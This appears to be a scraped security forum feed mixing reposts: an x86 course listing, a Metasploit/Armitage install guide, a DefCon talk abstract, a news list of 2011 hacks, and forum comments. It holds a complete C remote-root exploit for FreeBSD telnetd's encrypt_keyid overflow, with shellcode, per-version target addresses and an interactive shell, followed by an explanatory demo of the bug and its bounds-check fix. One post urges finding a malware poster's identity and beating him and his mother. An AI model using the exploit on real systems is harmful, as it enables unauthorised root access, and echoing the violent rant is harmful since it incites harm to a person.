Knowledge of this material is a prerequisite for future classes such as Intermediate x86, Rootkits, Exploits, and Introduction to Reverse Engineering.
To submit any suggestions, corrections, or explanations of things I didn't know the reasons for, please email me at the address included in the slides.
All Materials
IntroX86SlidesOnly.zip
IntroX86CodeOnly.zip
Videos of the class hosted at archive.org. These are useful for students, but also more useful for potential instructors who would like to teach this material. By watching the video, you will better understand the intent of some slides which do not stand on their own. You are recommended to watch the largest size video so that the most possible text is visible without having to follow along in the slides:
Online: Day 1 Part 1, Day 1 Part 2, Day 1 Part 3, Day 1 Part 4, Day 1 Part 5, Day 2 Part 1, Day 2 Part 2, Day 2 Part 3, Day 2 Part 4, Day 2 Part 5, Day 2 Part 6
Download videos:
- http://www.archive.org/download/IntroductoryIntelX86ArchitectureAssemblyApplicationsDay1Part1/PR_IntroX86_Day1_Part1.mp4
- http://www.archive.org/download/IntroductoryIntelX86ArchitectureAssemblyApplicationsDay1Part2/PR_IntroX86_Day1_Part2.mp4
- http://www.archive.org/download/IntroductoryIntelX86ArchitectureAssemblyApplicationsDay1Part3/PR_IntroX86_Day1_Part3.mp4
- http://www.archive.org/download/IntroductoryIntelX86ArchitectureAssemblyApplicationsDay1Part4/PR_IntroX86_Day1_Part4.mp4
- http://www.archive.org/download/IntroductoryIntelX86ArchitectureAssemblyApplicationsDay1Part5/PR_IntroX86_Day1_Part5.mp4
- http://www.archive.org/download/IntroductoryIntelX86ArchitectureAssemblyApplicationsDay2Part1/PR_IntroX86_Day2_Part1.mp4
- http://www.archive.org/download/IntroductoryIntelX86ArchitectureAssemblyApplicationsDay2Part2/PR_IntroX86_Day2_Part2.mp4
- http://www.archive.org/download/IntroductoryIntelX86ArchitectureAssemblyApplicationsDay2Part3/PR_IntroX86_Day2_Part3.mp4
- http://www.archive.org/download/IntroductoryIntelX86ArchitectureAssemblyApplicationsDay2Part4/PR_IntroX86_Day2_Part4.mp4
- http://www.archive.org/download/IntroductoryIntelX86ArchitectureAssemblyApplicationsDay2Part5/PR_IntroX86_Day2_Part5.mp4
- http://www.archive.org/download/IntroductoryIntelX86ArchitectureAssemblyApplicationsDay2Part6/PR_IntroX86_Day2_Part6.mp4
Revision History:
06-27-2011 - Videos uploaded
02-16-2011 - Initial class content upload
If you have used and modified this material, we would appreciate it if you submit your modified version for publishing here, so that all versions can benefit from your changes.
Source: IntroX86
-
x86/x64 Instruction Set Reference This is an unofficial online version of the Intel 64 instruction set reference. It provides a list of the available instructions for IA-32 and Intel 64 microprocessors, their assembly mnemonics, encodings, descriptions, pseudo code and the exceptions they can throw. This information is largely compatible with AMD64 processors, except for some minor differences. Link: http://siyobik.info/main/reference
-
Guide to Installing Metasploit 4 and Armitage on Mac OSX Lion
12-26-11
After many hours of trial and error, I have been able to put together a guide to getting Metasploit 4 and Armitage working properly on Mac OSX. I would also like to give a tremendous amount of credit to BrianCanFixIT @ Faulty Logic. His blog post on setting up Armitage helped me through the missing piece of getting the PostgreSQL database up and running properly.
[h=3]Prerequisites[/h]
Install XCode (I am running v4.2)
[h=3]PostgreSQL Installation[/h]
Download and Install PostgreSQL via the free GUI installer. Setup your root PostgreSQL password during installation.
Launch the newly installed PGAdmin III application. Connect (double click) on the local PostgreSQL database and enter your root password when prompted.
Under the PostgreSQL drop down, right click on "Login Roles", and select "New Login Role". Set the role name to msfuser. Click on the definition tab, and set the password as msfpassword. Click OK to continue.
Next, right click on the databases list, and select "New Database". Set the name to metasploitdb, and set the owner to msfuser. Press OK, and we're done. You can close PGAdmin.
[h=3]MacPorts[/h]
Download and install MacPorts from http://www.macports.org/install.php
Good Tip: add "/opt/local" to your spotlight privacy settings to avoid excessive compile times & unnecessary indexing by spotlight (System Preferences->Spotlight->Privacy->"+").
Quit terminal & relaunch to accept new path settings added by MacPorts.
[h=3]Install Ruby, RubyGems (PostgreSQL and MsgPack)[/h]
[code]
# Run as root
sudo bash
# Update MacPorts
port selfupdate
# Install Ruby
port install ruby19 +nosuffix
# Install the PostgreSQL gem connector (64-bit systems)
env ARCHFLAGS='-arch x86_64' gem install pg -- --with-opt-include=/Library/PostgreSQL/9.1/include/ --with-opt-lib=/Library/PostgreSQL/9.1/lib/
# Install MsgPack
port install msgpack
# Install the msgpack gem
gem install msgpack
# Add Ruby to your path
export PATH=/opt/msf3:$PATH
# Ensure that /opt/local/bin appears before /usr/bin, else edit your ~/.bash_profile file and source it
echo $PATH
[/code]
[h=3]Metasploit 4 Installation[/h]
[code]
# Download Metasploit via Subversion
sudo svn co https://www.metasploit.com/svn/framework3/trunk/ /opt/local/msf/
# Create a symbolic link to the msf applications
# This is done because including it in your path configuration doesn't seem to work.
sudo ln -s /opt/local/msf/msf* /opt/local/bin
[/code]
[h=3]Configure the Metasploit Database[/h]
[code]
# Create the configuration directory
sudo mkdir /opt/local/config
# Create/Edit the following file
sudo vi /opt/local/config/database.yml
[/code]
Include the following in your database.yml file:
[code]
# These settings are for the database used by the Metasploit Framework
# unstable tree included in this installer, not the commercial editions.
production:
  adapter: "postgresql"
  database: "metasploitdb"
  username: "msfuser"
  password: "msfpassword"
  port: 5432
  host: "localhost"
  pool: 256
  timeout: 5
[/code]
[h=3]Running Metasploit and Armitage[/h]
[code]
# Include the database location in your config
export MSF_DATABASE_CONFIG=/opt/local/config/database.yml
# Launch Metasploit
sudo msfrpcd -U msfuser2 -P msfpassword2 -t Msg
# Launch Armitage
sudo armitage
[/code]
[h=3]Enjoy![/h]
Source: http://www.nightlion.net/guides/2011/guide-to-installing-metasploit-4-and-armitage-on-mac-osx-lion/
-
Android app permissions

THESE AREN'T THE PERMISSIONS YOU'RE LOOKING FOR

Anthony Lineberry, David Luke Richardson, Tim Wyatt
DefCon 18

• Android Internals Overview
• Security/Permission Model
• Why Ask For Permission When You Can Ask For Forgiveness?
• Log-Cat: Our Inside Mole
• The Ultimate Permission (Yes, we're talking about root)
• Mitigation

Download: https://www.defcon.org/images/defcon-18/dc-18-presentations/Lineberry/DEFCON-18-Lineberry-Not-The-Permissions-You-Are-Looking-For.pdf
-
Top 10 hacking scandals of 2011

Sonakshi Babbar, Hindustan Times
New Delhi, December 27, 2011

As more and more celebrities join the social networking bandwagon, they also become increasingly vulnerable to hacking. From heads of state to Hollywood celebrities, this year saw a series of hacking incidents involving high-profile victims. Check out the most controversial ones.

Selena Gomez
Selena Gomez's Twitter and Facebook fans woke up to an uncharacteristic post about her boyfriend Justin Bieber. The venomous post screamed "Oh yeah, JUSTIN BIEBER SUCKS!!!!!!!". The teen singer immediately clarified that it was a case of hacking and she had nothing to do with the post.

Ashton Kutcher
Hollywood star Ashton Kutcher, who used to host the celebrity prank show Punk'd, got a taste of his own medicine when his Twitter account @aplusk was hacked. A tweet sent to his followers said, "Ashton, you've been Punk'd. This account is not secure. Dude, where's my SSL?"

Kim Kardashian
Kim Kardashian went into panic mode when her Twitter account was hacked by internet pranksters this year. On discovering fake tweets posted by an impostor, the socialite appealed to the site's bosses to help restore the security of her account.

Sony PlayStation
In one of the biggest data breaches, Sony admitted to an external intrusion which exposed the personal information of 77 million PlayStation Network users. The PlayStation maker warned users that the hackers might have access to customers' vital information, including names, birthdates, physical and e-mail addresses, logins, handles and credit card details.

Research in Motion
Hackers defaced a website belonging to BlackBerry maker Research in Motion soon after the company revealed its plans to support police investigating the London riots. The hackers posted on the blog: "No Blackberry you will NOT assist the police." BlackBerry took the blog offline briefly and restored it to its original form.

Facebook
In one of the most shocking security breach incidents, around two lakh (200,000) Facebook accounts were hacked in Bangalore. The users' photos and videos were morphed and the sleazy links mailed to friends and family overnight.

Lady Gaga
A scam on Lady Gaga's Facebook page fooled many fans into clicking a link to win an iPad. The contest rules and registration were presented as a link to a Blogspot page. "Lady Gaga's new iPad comes out in 3 days! So for the next 72 hours we will be hosting a massive giveaway to all the Mother Monster fans. Sign up and receive your special Lady Gaga edition iPad in time for the Holidays!" the hackers posted on her Facebook page. The presence of the fake iPad offer didn't go unnoticed, and it was taken down within an hour.

Nicolas Sarkozy
Hackers played a cruel joke on French President Nicolas Sarkozy when they posted a fake resignation letter from his Facebook page. The post, which went out to more than 350,000 'friends' of the head of state, read: "Dear compatriots, given the exceptional circumstances our country is experiencing, I have decided in my spirit and conscience not to run for office again at the end of my mandate in 2012".

Yingluck Shinawatra
Thailand's Prime Minister, Yingluck Shinawatra, fell victim to the hacking menace when her Twitter account was hacked. Her followers received tweets criticizing her lack of political experience and her incompetence. The tweets also suggested that she was the puppet of her brother, former Prime Minister Thaksin Shinawatra.

Fox News
While celebrities and popular figures have been the target of hackers, it was media house Fox News that faced their ire in July this year. In a gruesome joke, the hackers tweeted the death of President Obama. Some of the tweets read: "@BarackObama has just passed. The President is dead. A sad 4th of July, indeed. President Barack Obama is dead." This was followed by more along the same lines claiming that Obama was shot at a restaurant while campaigning.
Source: Top 10 hacking scandals of 2011 - Hindustan Times
-
Bixxtonim and HJOCONCEPT95 - both banned. PS: I don't follow these topics.
-
Boss, analyzing a piece of malware isn't done in 30 seconds. It takes a long time to analyze a file, and I have no intention of spending half an hour checking some crap program, like a stealer/crypter or whatever other garbage you people are after, because the moment you come here to download a stealer, crypter, Havij or the like, it's clear you're a waste of space, that you're script kiddies with hacker airs and have no business here. In other words I don't give a damn that you infect yourselves trying to download who knows what junk program. If you were serious and didn't mess around with that kind of garbage you wouldn't have any problem.

Meanwhile, you're free to take every crap program from here, from this category, and analyze it. You look at the strings for a start, check the executable's resources and see whether there's another executable in there, check the sections and see whether you find a suspicious one, check the import table, scan it on VirusTotal and Anubis to begin with, install Wireshark on a virtual machine to see whether it sends data, Process Monitor to see which APIs it calls, Autoruns to see whether it adds itself to startup, GMER anti-rootkit to see whether the thing happens to have a little rootkit, then do a bit of debugging as well, check whether from the entry point it does a jmp to who knows what function and then returns to the entry point, take snapshots of the file system and the Registry and check whether anything changes, check whether it's running in a sandbox, disassemble it and see whether Main() checks for the presence of a sandbox/VM, and much more.

Then you post a complete summary in that topic, you say "Hey loser, look, it's infected because the entry point is actually a jmp to a download-and-execute shellcode", and I delete the download link, move the topic to the trash, and the one who posted it gets a permanent ban.

You can also make the discovered data public, e.g. "it tries to send mail to vasile@gmail.com", and I can make public the e-mail address used here on the forum, or the IPs, and tell you which city he's from. Then, if that person really upset you, we look him up on Facebook or other sites, find out as much as we can about him, and go and give him and his mother a beating for raising a fool who wants to steal our Facebook passwords.

But as long as all you have is demands, keep your mouth shut and stop commenting nonsense; nobody is going to bother checking the crap programs posted here. Maybe if it were a serious program, yes, but Havij? If you're good you don't need something like that, you only need a browser, but being a script kiddie, you deserve to run all the infected programs, because you don't even know what a virtual machine or even a sandbox is.
-
Telnetd encrypt_keyid: Remote Root function pointer overwrite

/***************************************************************************
 * telnetd-encrypt_keyid.c
 *
 * Mon Dec 26 20:37:05 CET 2011
 * Copyright 2011 Jaime Penalba Estebanez (NighterMan)
 *
 * nighterman@painsec.com - jpenalbae@gmail.com
 * Credits to batchdrake as always
 *
 *  ______ __ ________
 *  / __ / /_/ / _____/
 *  / /_/ /______________\ \_____________
 *  / ___ / __ / / __ / \ \/ _ \/ __/
 *  / / / /_/ / / / / /___/ / __/ /__
 *  ____/__/____\__,_/_/_/ /_/______/\___/\____/____
 *
 ****************************************************************************/

/*
 *
 * Usage:
 *
 * $ gcc exploit.c -o exploit
 *
 * $ ./exploit 127.0.0.1 23 1
 * [<] Success reading initial server request 3 bytes
 * [>] Telnet initial encryption mode and IV sent
 * [<] Server response: 8 bytes read
 * [>] First payload to overwrite function pointer sent
 * [<] Server response: 6 bytes read
 * [>] Second payload to trigger the function pointer
 *  [*] got shell?
 * uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/time.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define MAXKEYLEN 64-1

/* Mirrors telnetd's key_info: the keyid buffer is followed in memory by the
 * control fields and the getcrypt function pointer that gets overwritten. */
struct key_info {
    unsigned char keyid[MAXKEYLEN];
    unsigned char keylen[4];
    unsigned char dir[4];
    unsigned char modep[4];
    unsigned char getcrypt[4];
};

/* FreeBSD/x86: setuid(0); execve("//bin/sh", ...) */
static unsigned char shellcode[] =
    "\x31\xc0"              // xor %eax,%eax
    "\x50"                  // push %eax
    "\xb0\x17"              // mov $0x17,%al   (SYS_setuid)
    "\x50"                  // push %eax
    "\xcd\x80"              // int $0x80
    "\x50"                  // push %eax
    "\x68\x6e\x2f\x73\x68"  // push $0x68732f6e  ("n/sh")
    "\x68\x2f\x2f\x62\x69"  // push $0x69622f2f  ("//bi")
    "\x89\xe3"              // mov %esp,%ebx
    "\x50"                  // push %eax
    "\x54"                  // push %esp
    "\x53"                  // push %ebx
    "\x50"                  // push %eax
    "\xb0\x3b"              // mov $0x3b,%al   (SYS_execve)
    "\xcd\x80";             // int $0x80

/* IAC SB ENCRYPT IS DES_CFB64 CFB64_IV <8 IV bytes> IAC SE */
static unsigned char tnet_init_enc[] =
    "\xff\xfa\x26\x00\x01\x01\x12\x13"
    "\x14\x15\x16\x17\x18\x19\xff\xf0";

/* IAC SB ENCRYPT ENC_KEYID */
static unsigned char tnet_option_enc_keyid[] = "\xff\xfa\x26\x07";

/* IAC SE */
static unsigned char tnet_end_suboption[] = "\xff\xf0";

/*
 * shell(): semi-interactive shell hack
 */
static void shell(int fd)
{
    fd_set fds;
    char tmp[128];
    int n;

    /* check uid */
    write(fd, "id\n", 3);

    /* semi-interactive shell */
    for (;;) {
        FD_ZERO(&fds);
        FD_SET(fd, &fds);
        FD_SET(0, &fds);

        if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) {
            perror("select");
            break;
        }

        /* read from fd and write to stdout (0 bytes = remote side closed) */
        if (FD_ISSET(fd, &fds)) {
            if ((n = read(fd, tmp, sizeof(tmp))) <= 0) {
                fprintf(stderr, "Goodbye...\n");
                break;
            }
            if (write(1, tmp, n) < 0) {
                perror("write");
                break;
            }
        }

        /* read from stdin and write to fd */
        if (FD_ISSET(0, &fds)) {
            if ((n = read(0, tmp, sizeof(tmp))) < 0) {
                perror("read");
                break;
            }
            if (write(fd, tmp, n) < 0) {
                perror("write");
                break;
            }
        }
    }

    close(fd);
    exit(1);
}

static int open_connection(in_addr_t dip, int dport)
{
    int pconn;
    struct sockaddr_in cdata;
    struct timeval timeout;

    /* timeout.tv_sec = _opts.timeout; */
    timeout.tv_sec = 8;
    timeout.tv_usec = 0;

    /* Set socket options and create it */
    cdata.sin_addr.s_addr = dip;
    cdata.sin_port = htons(dport);
    cdata.sin_family = AF_INET;

    pconn = socket(AF_INET, SOCK_STREAM, 0);
    if (pconn < 0) {
        printf("Socket error: %i\n", pconn);
        printf("Err message: %s\n", strerror(errno));
        exit(-1);
    }

    /* Set socket timeout */
    if (setsockopt(pconn, SOL_SOCKET, SO_RCVTIMEO, (void *)&timeout,
                   sizeof(struct timeval)) != 0) {
        perror("setsockopt SO_RCVTIMEO: ");
        exit(1);
    }

    /* Set socket options */
    if (setsockopt(pconn, SOL_SOCKET, SO_SNDTIMEO, (void *)&timeout,
                   sizeof(struct timeval)) != 0) {
        perror("setsockopt SO_SNDTIMEO: ");
        exit(1);
    }

    /* Make connection */
    if (connect(pconn, (struct sockaddr *)&cdata, sizeof(cdata)) != 0) {
        close(pconn);
        return -1;
    }

    return pconn;
}

static void usage(char *arg)
{
    printf("Telnetd encrypt_keyid exploit for FreeBSD\n");
    printf("NighterMan <nighterman@painsec.com>\n\n");
    printf("Usage: %s [ip] [port] [target]\n", arg);
    printf("Available Targets:\n");
    printf(" - 1: FreeBSD 8.0 & 8.1\n");
    printf(" - 2: FreeBSD 8.2\n\n");
}

int main(int argc, char *argv[])
{
    /* Payload Size */
    int psize = (sizeof(struct key_info) + sizeof(tnet_option_enc_keyid) +
                 sizeof(tnet_end_suboption));

    struct key_info bad_struct;
    unsigned char payload[psize];
    unsigned char readbuf[256];
    int ret;
    int conn;
    int offset = 0;

    if (argc != 4) {
        usage(argv[0]);
        return -1;
    }

    /* Fill the structure */
    memset(&bad_struct, 0x90, sizeof(struct key_info));
    memcpy(&bad_struct.keyid[20], shellcode, sizeof(shellcode));
    memcpy(bad_struct.keylen, "DEAD", 4);
    memcpy(bad_struct.dir, "BEEF", 4);
    memcpy(bad_struct.modep, "\x6c\x6f\x05\x08", 4); /* Readable address */

    /* Shellcode address (function pointer overwrite) */
    switch (atoi(argv[3])) {
    case 1:
        memcpy(bad_struct.getcrypt, "\xa6\xee\x05\x08", 4);
        break;
    case 2:
        memcpy(bad_struct.getcrypt, "\xed\xee\x05\x08", 4);
        break;
    default:
        printf("Bad target\n");
        return -1;
        break;
    }

    /* Prepare the payload with the overflow */
    memcpy(payload, tnet_option_enc_keyid, sizeof(tnet_option_enc_keyid));
    offset += sizeof(tnet_option_enc_keyid);
    memcpy(&payload[offset], &bad_struct, sizeof(bad_struct));
    offset += sizeof(bad_struct);
    memcpy(&payload[offset], tnet_end_suboption, sizeof(tnet_end_suboption));

    /* Open the connection */
    conn = open_connection(inet_addr(argv[1]), atoi(argv[2]));
    if (conn == -1) {
        printf("Error connecting: %i\n", errno);
        return -1;
    }

    /* Read initial server request */
    ret = read(conn, readbuf, 256);
    printf("[<] Success reading initial server request %i bytes\n", ret);

    /* Send encryption and IV */
    ret = write(conn, tnet_init_enc, sizeof(tnet_init_enc));
    if (ret != sizeof(tnet_init_enc)) {
        printf("Error sending init encryption: %i\n", ret);
        return -1;
    }
    printf("[>] Telnet initial encryption mode and IV sent\n");

    /* Read response */
    ret = read(conn, readbuf, 256);
    printf("[<] Server response: %i bytes read\n", ret);

    /* Send the first payload with the overflow */
    ret = write(conn, payload, psize);
    if (ret != psize) {
        printf("Error sending payload first time\n");
        return -1;
    }
    printf("[>] First payload to overwrite function pointer sent\n");

    /* Read response */
    ret = read(conn, readbuf, 256);
    printf("[<] Server response: %i bytes read\n", ret);

    /* Send the payload again to trigger the overwritten function pointer */
    ret = write(conn, payload, psize);
    if (ret != psize) {
        printf("Error sending payload second time\n");
        return -1;
    }
    printf("[>] Second payload to trigger the function pointer\n");

    /* Start the semi-interactive shell */
    printf(" [*] got shell?\n");
    shell(conn);

    return 0;
}

I was reading about this issue before Christmas; it seems an exploit for telnetd has appeared.

Source: Telnetd encrypt_keyid: Remote Root function pointer overwrite

More info: http://thexploit.com/secdev/a-textbook-buffer-overflow-a-look-at-the-freebsd-telnetd-code/
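The exploit above only makes sense next to the bug it abuses, so here is an added C illustration of that bug; it is not the exploit author's code and not telnetd's source. It models the server-side key_info the way the exploit's own struct lays it out (a fixed keyid buffer directly followed by keylen, dir, modep and the getcrypt function pointer), stores an attacker-supplied ENC_KEYID into it once without a length check and once with one, and reports whether getcrypt was clobbered. Field types, the helper names and the 0x41 payload are assumptions made for the demo; the real telnetd uses memcpy(), which is replaced here by a byte loop purely so that a FORTIFY_SOURCE build of this file cannot abort inside __memcpy_chk before the overwrite can be observed.

```c
/*
 * Model of the telnetd ENC_KEYID overflow. Added illustration: not the
 * exploit's code and not telnetd's source. Field types are modelled after
 * the struct key_info used in the exploit; names are hypothetical.
 */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAXKEYLEN 64

struct key_info {
    unsigned char keyid[MAXKEYLEN];  /* fixed-size key id buffer          */
    int keylen;                      /* length of the stored key id        */
    int dir;                         /* direction (unused in this demo)    */
    int *modep;                      /* dereferenced on the next ENC_KEYID */
    int (*getcrypt)(int);            /* called on the next ENC_KEYID       */
};

/* Stand-in for telnetd's getcrypt lookup: the legitimate call target. */
static int real_getcrypt(int mode)
{
    return mode + 1;
}

/*
 * Vulnerable store, shaped like encrypt_keyid(): compare with the stored
 * key id and copy the new one, trusting the suboption length completely.
 * noinline keeps the copy out of the caller so the overwrite is visible
 * through memory regardless of optimisation level.
 */
__attribute__((noinline))
static void vulnerable_store(struct key_info *kp, const unsigned char *keyid, int len)
{
    int i;

    if (len != kp->keylen || memcmp(keyid, kp->keyid, len) != 0) {
        kp->keylen = len;             /* no check against MAXKEYLEN        */
        for (i = 0; i < len; i++)     /* byte loop standing in for memcpy  */
            kp->keyid[i] = keyid[i];  /* runs past keyid[] when len > 64   */
    }
}

/* Hardened store: a key id that does not fit the buffer is rejected. */
__attribute__((noinline))
static int hardened_store(struct key_info *kp, const unsigned char *keyid, int len)
{
    if (len < 0 || len > MAXKEYLEN)
        return -1;                    /* reject instead of overflowing     */
    if (len != kp->keylen || memcmp(keyid, kp->keyid, len) != 0) {
        kp->keylen = len;
        memcpy(kp->keyid, keyid, len);
    }
    return 0;
}

/* Compare the raw bytes of kp->getcrypt with the legitimate pointer. */
static int pointer_was_overwritten(const struct key_info *kp)
{
    int (*expected)(int) = real_getcrypt;
    return memcmp(&kp->getcrypt, &expected, sizeof expected) != 0;
}

/*
 * One ENC_KEYID carrying a key id as long as the whole struct, like the
 * exploit's bad_struct: filler for keyid[], then bytes that land on keylen,
 * dir, modep and getcrypt. Returns 1 if getcrypt was clobbered, else 0.
 */
int demo_overflow(int hardened)
{
    static int mode = 0;
    struct key_info kp;
    unsigned char keyid[sizeof(struct key_info)];  /* constructed payload */

    memset(&kp, 0, sizeof kp);
    kp.modep = &mode;
    kp.getcrypt = real_getcrypt;
    memset(keyid, 0x41, sizeof keyid);

    if (hardened)
        hardened_store(&kp, keyid, (int)sizeof keyid);
    else
        vulnerable_store(&kp, keyid, (int)sizeof keyid);

    /* telnetd would now reach (*kp->getcrypt)(*kp->modep) on the next
     * ENC_KEYID, which is why the exploit sends its payload twice:
     * once to overwrite the pointer, once to make the server call it. */
    return pointer_was_overwritten(&kp);
}

int main(void)
{
    printf("vulnerable store: getcrypt overwritten = %d\n", demo_overflow(0));
    printf("hardened store:   getcrypt overwritten = %d\n", demo_overflow(1));
    return 0;
}
```

The check is the whole fix: once len is bounded by the buffer, the control fields behind keyid[] can no longer be reached, and the second ENC_KEYID calls the real getcrypt instead of an attacker-chosen address. The same layout argument explains why the exploit must supply a readable address for modep: the server dereferences it before the overwritten getcrypt is called.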
-
STRATFOR leaked accounts (10257 passwords recovered)
Nytro replied to nacks's topic in Programe utile
The passwords aren't for the e-mail accounts but for the site they were "taken" from. Still, there's a chance some people use the same password in several places.
The part about "stealing" from frameworks isn't really about stealing, more about learning. Those frameworks are usually written by people with many years of experience in the field, and they are often good sources of documentation, sources from which you can learn a lot:
- code optimizations
- code layout and documentation
- professional code writing
-
Latest updates:

[h=6]Open Penetration Testing Bookmarks Collection Vulnerability Database Pentagon approved Android to be used by DoD officials STRATFOR leaked accounts (10257 passwords recovered) Lynis Auditing Tool 1.3.0 Ubertooth ARP Cache Poisoning Monkey || ARP Poisoning tool Network Destroyer ARP TCP Flooder [Rezolvare] SQL Injection Control Remote System [SQLi] Intel MySQL 5.5.8 Remote Denial Of Service (DOS) Lighttpd 1.4.30 / 1.5 Denial Of Service[/h]

[h=6]The Perfect Server - CentOS 6.1 x86_64 With nginx Execute Binary In The Alternate Data Stream [Unix] Install Freebsd 8 in 8 minutes False SQL Injection and Advanced Blind SQL Injection Simple Virtual Machine Untethered jailbreak demonstrated for iOS 5, iOS 5.1 Kaspersky Anti-Virus and Internet Security 2012 Vulnerable to Hackers China Software Developer Network (CSDN) 6 Million user data Leaked The Crypter Blueprint[/h]

[h=6]Oracle Solaris 11 Kernel Source Leaked HTML5 web security Metasploit on Amazon Kindle Securitytube Metasploit Framework Expert ( Armitage ) Probably the Best Free Security List in the World A simple HTML tag will crash 64-bit Windows 7 Excel formula injection in Google Docs CSS - The sexy assasin Backdoor in Android for No-Permissions Reverse Shell[/h]

If you're interested in the useful topics on the forum:

Like: Romanian Security Team | Facebook http://www.facebook.com/rstforum
-
It depends on what you mean by that. If you want to learn programming only at a basic level and then start studying frameworks, YES, that's not really ok, in the sense that you won't understand what exactly those frameworks do, how they work. If instead you learn programming well, and see with your own eyes that you can do yourself what a framework does, you'll look at the situation differently: you'll start considering optimizations, namely that you don't actually need that whole framework and that if you implement part of the framework yourself you can implement it in a way better suited to your project. Then, since you'd know how to do what that framework does, there'd be no problem studying that framework's code, taking a few ideas, or even pieces of code, because you'd understand them. If from the start, with one line of code, you do what 1000 lines of code would do, you have no idea what's actually happening and you don't have the control you'd need, in case you go straight to frameworks.